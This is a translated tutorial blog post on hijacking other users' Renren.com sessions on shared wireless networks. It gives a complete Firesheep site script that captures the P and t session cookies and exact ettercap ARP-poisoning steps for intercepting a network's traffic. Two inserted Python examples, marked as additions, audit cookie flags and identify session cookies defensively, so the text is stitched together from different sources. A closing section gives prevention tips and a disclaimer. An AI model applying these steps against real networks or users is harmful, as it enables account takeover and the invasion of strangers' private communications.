Use firesheep to hijack renren.com.

Source: Internet
Author: User
Tags: firesheep

I. The hijacking principle:

Web authentication usually works in the following steps, and Renren (formerly Xiaonei, the "on-campus network") is no exception:

1. Go to Renren.com, enter your username and password, and click Log On.

2. The server verifies the ID and password you submitted, then returns some unique cookies to your browser.

3. When you view other people's pages, the browser first sends the cookie to the server to prove your identity.

4. The server verifies the cookie and performs the requested action.

These steps are fine on their own, but there is an underlying problem: is the communication between the user and the server encrypted? If not, a third party can easily intercept the user's packets and impersonate the real user in its communication with the server.

In the Internet, security is a piece of shit.

1. The most basic requirement is that a website switch its login page to HTTPS. The username and password you submit are then encrypted in transit, so even someone who intercepts your packets cannot read them. Renren does not do this: the username and password you enter are sent to the server in plain text. If you don't believe it, check with any packet capture tool.

2. Encryption is required not only for the login request but also for every request that carries the cookies. Before Firesheep was released, even Google and Facebook did not do this, let alone Renren. As a result, by intercepting someone else's cookies you can log on to their Renren account directly. That is the process described in this article.
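The point above is what the Secure attribute on a cookie exists for: a cookie without it is sent by the browser on every plain http:// request, which is exactly what a sniffer on an unencrypted wireless network collects. The following is an added example, not code from the original post, that audits Set-Cookie headers for session cookies missing Secure (and HttpOnly) and produces the corrected header. The sample headers are constructed; only the cookie names P and t come from the post.

```python
"""Audit Set-Cookie headers for session cookies that can leak over plain HTTP."""
from typing import Dict, Iterable, List, NamedTuple


class SetCookie(NamedTuple):
    name: str
    value: str
    attrs: Dict[str, str]  # attribute name lower-cased -> value ("" for flags such as Secure)


def parse_set_cookie(line: str) -> SetCookie:
    """Split one Set-Cookie header value into name, value and attributes."""
    pieces = [p.strip() for p in line.split(";")]
    name, _, value = pieces[0].partition("=")
    attrs: Dict[str, str] = {}
    for piece in pieces[1:]:
        if piece:
            key, _, val = piece.partition("=")
            attrs[key.strip().lower()] = val.strip()
    return SetCookie(name.strip(), value.strip(), attrs)


# Secure: never sent over http://. HttpOnly: not readable by page scripts.
REQUIRED_FLAGS = ("secure", "httponly")


def audit_session_cookies(set_cookie_lines: Iterable[str], session_names: Iterable[str]) -> Dict[str, List[str]]:
    """Return {cookie_name: [missing flags]} for every session cookie that lacks a required flag."""
    wanted = set(session_names)
    findings: Dict[str, List[str]] = {}
    for line in set_cookie_lines:
        cookie = parse_set_cookie(line)
        if cookie.name in wanted:
            missing = [flag for flag in REQUIRED_FLAGS if flag not in cookie.attrs]
            if missing:
                findings[cookie.name] = missing
    return findings


# Canonical spelling for re-rendering attributes (unknown attributes are echoed as seen).
CANONICAL = {"secure": "Secure", "httponly": "HttpOnly", "domain": "Domain",
             "path": "Path", "expires": "Expires", "max-age": "Max-Age", "samesite": "SameSite"}


def harden_set_cookie(line: str) -> str:
    """Return the same Set-Cookie header with Secure and HttpOnly added where absent."""
    cookie = parse_set_cookie(line)
    attrs = dict(cookie.attrs)
    for flag in REQUIRED_FLAGS:
        attrs.setdefault(flag, "")
    rendered = [f"{cookie.name}={cookie.value}"]
    for key, val in attrs.items():
        label = CANONICAL.get(key, key)
        rendered.append(label if val == "" else f"{label}={val}")
    return "; ".join(rendered)


# Constructed Set-Cookie lines standing in for a login response; P and t are the names from the post.
SAMPLE_RESPONSE_HEADERS = [
    "P=constructed-p-token; Domain=.renren.com; Path=/",
    "t=constructed-t-token; Domain=.renren.com; Path=/; HttpOnly",
    "anonymid=tracking-id; Domain=.renren.com; Path=/; Expires=Wed, 21 Oct 2015 07:28:00 GMT",
]
SESSION_COOKIES = {"P", "t"}

if __name__ == "__main__":
    for name, missing in audit_session_cookies(SAMPLE_RESPONSE_HEADERS, SESSION_COOKIES).items():
        print(f"session cookie {name!r} is missing: {', '.join(missing)}")
    for line in SAMPLE_RESPONSE_HEADERS:
        print("hardened:", harden_set_cookie(line))
```

Run against real headers, the same check can be done on the values Chrome shows in its cookie editor: a session cookie whose Secure box is unchecked is one a sniffer can use. Note that Secure only protects the cookie in transit; the login form itself still has to be served over HTTPS, as point 1 above says.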

A natural question: how can someone else get my packets when I access the Internet? On a wired network this is generally not a problem. But in many cases you access the Internet through a wireless router, and a wireless router radiates its packets into the whole space, so any network adapter within range can receive them. This gives some people an opportunity. Under normal circumstances the network adapter discards packets not addressed to itself, but special software can make it save the packets that were meant for others, and the private data in them can then be analyzed. The common library for this is libpcap, known as WinPcap on Windows.

So the principle is clear: first a pcap-based tool intercepts other people's packets, then their Renren cookies are extracted from those packets, and finally the cookies are used to log on to their accounts directly. The username and password never need to be known at any point.

II. Environment Description:

Ubuntu 10.10, Firefox 3.6, Chrome 10, Firesheep, Ettercap

Explanation: Windows wraps the NIC in its own abstraction layer, so packet capture there is not as capable as on Linux and Mac; my first attempt on Windows 7 failed.

Firesheep is a Firefox extension, so Firefox must be installed.

Chrome is used to analyze the website's cookies.

Firesheep does the main work; for installing it on Ubuntu 10.10 see http://blog.csdn.net/anchor89/archive/2011/04/04/6301948.aspx

Ettercap is the packet capture software. Its installation is covered in the same link.

III. Steps:

1. Analyze the cookie of Renren.com

Open Chrome and install the extension named Edit This Cookie. Log on to your Renren account and click the Edit This Cookie icon to view the cookies Renren.com has returned to you. Delete these cookies one by one, recording each, and refresh the page after every deletion until a refresh prompts you to log on again. That means the cookie used for identity authentication has been deleted; restore the deleted cookies and retest until you have determined which one carries the authentication. Note that more than one cookie may be involved in authentication, which requires more elaborate pairing tests.

In the end, we found that Renren.com has two cookies for identity authentication, namely P and T.

Chrome can now be closed.
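The elimination test in step 1 is the same one a site operator runs on their own service to learn exactly which cookies carry the login state (and therefore must never travel over plain HTTP). The following is an added example, not code from the original post, that automates it offline: a constructed stand-in for the server, fake_renren, plays the role of "refresh the page and see whether you are prompted to log on again", and the cookie names P and t are the ones the post identifies. It goes beyond the post in also handling the "pairing test" case, where the site accepts more than one combination of cookies.

```python
"""Find which cookies actually carry the login state, by elimination."""
from itertools import combinations
from typing import Callable, Dict, FrozenSet, List

Cookies = Dict[str, str]
Oracle = Callable[[Cookies], bool]  # True when the server still treats the request as logged in

# Constructed cookie jar, as a cookie editor would show it after logging in.
ISSUED: Cookies = {
    "P": "constructed-p-token",
    "t": "constructed-t-token",
    "anonymid": "tracking-id",
    "_r01_": "ui-preference",
}


def fake_renren(cookies: Cookies) -> bool:
    """Constructed server-side check: the session is valid only if both P and t match what was issued."""
    return cookies.get("P") == ISSUED["P"] and cookies.get("t") == ISSUED["t"]


def minimal_session_cookies(cookies: Cookies, logged_in: Oracle) -> FrozenSet[str]:
    """Greedy elimination, exactly as in the manual procedure: remove cookies one at a time
    and keep a cookie only if removing it logs you out. Returns one minimal set."""
    kept = dict(cookies)
    for name in list(cookies):
        trial = {k: v for k, v in kept.items() if k != name}
        if logged_in(trial):
            kept = trial  # this cookie was not needed for authentication; drop it for good
    return frozenset(kept)


def all_minimal_sets(cookies: Cookies, logged_in: Oracle) -> List[FrozenSet[str]]:
    """Exhaustive pairing test for small cookie jars: every subset that keeps the session alive
    and contains no smaller subset that also does. Needed when the site accepts alternatives."""
    names = list(cookies)
    winners: List[FrozenSet[str]] = []
    for size in range(len(names) + 1):  # smallest subsets first, so supersets are pruned below
        for combo in combinations(names, size):
            subset = frozenset(combo)
            if any(winner <= subset for winner in winners):
                continue  # contains an already-found minimal set, so it is not minimal itself
            if logged_in({n: cookies[n] for n in subset}):
                winners.append(subset)
    return winners


if __name__ == "__main__":
    print("greedy result:", sorted(minimal_session_cookies(ISSUED, fake_renren)))
    print("all minimal sets:", [sorted(s) for s in all_minimal_sets(ISSUED, fake_renren)])
```

The greedy pass needs one request per cookie and is what the manual procedure does; the exhaustive pass costs 2^n requests and is only worth running when the greedy result looks suspicious (for example, when two different orders of deletion give two different answers).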

2. Configure firesheep script

Open Firefox, open the Firesheep preferences page, find the Websites tab, and click Add to add a new site named Renren. Double-click it to open a JavaScript editor.

Replace the content with the following script:

    register({
      // For http://www.renren.com/
      name: 'renren.com',                // The name that will show up in the Firesheep sidebar
      url: 'http://www.renren.com/',     // The website URL that Firesheep will match on
      domains: ['renren.com'],           // The actual domain that Firesheep will look for in the request
      sessionCookieNames: ['P', 't'],    // A list of cookie key names that Firesheep will intercept and send on
                                         // your behalf (this should be the list of cookies you noted in the previous step)
      identifyUser: function () {        // Firesheep can make a request to discover some information about the cookie (username and avatar) for the buddy list
        var site = this.httpGet(this.siteUrl);                         // This will pull down a page that contains the value for the username and avatar
        this.userName = site.body.querySelector('a.name').innerHTML;   // Use a query selector to pull out the username from the page (optional)
        // this.userAvatar = site.body.querySelector('div.figure').src; // Another query selector to grab the image (optional)
      }
    });

The fields before identifyUser configure the cookie names, the URL and the domain; these are essential.

In identifyUser, this.userName and this.userAvatar set the account name and avatar shown next to a captured cookie. Commenting out both lines does not affect the capture.

Close the editor after replacing the script.

3. Set ettercap

Open a terminal and enter

sudo ettercap -G

Run the following menu commands in sequence:

Sniff > Unified sniffing

Hosts > Scan for hosts

At this point the software searches for hosts on the same network segment; once the scan finishes, continue with:

Hosts > Hosts list

In the list, add the router's address (usually 192.168.1.1) to Target 1; Target 2 does not need to be set (according to my experiment, it doesn't matter if neither Target 1 nor Target 2 is set).

Mitm > Arp poisoning..., and tick "Sniff remote connections"

Start > Start sniffing

At this point, the network card starts to capture packets.

4. Use firesheep

Open Firefox (if you had closed it), press Ctrl+Shift+S to open the Firesheep sidebar, click the Start button, and wait. If Firesheep detects that someone has logged on to Renren.com, that account appears in the sidebar automatically; double-click the entry to log on to renren.com as that user.

5. How to prevent others from logging on to your account?

Do not log on to Renren or other accounts on hotspots such as those at Starbucks: these hotspots are unencrypted, and anyone with bad intentions can easily intercept other people's packets.

Be careful as well when going online through a shared wireless router in a dormitory. A wired connection is fine.

If you connect to a wireless network but then reach the Internet through a VPN or a similar method, you don't have to worry, because the VPN tunnel itself is encrypted.

======================================

This article is only for technical exchanges. Do not use the Internet to engage in illegal activities. We also hope that Internet companies can improve these vulnerabilities as soon as possible to create a secure and carefree network environment for Internet users.
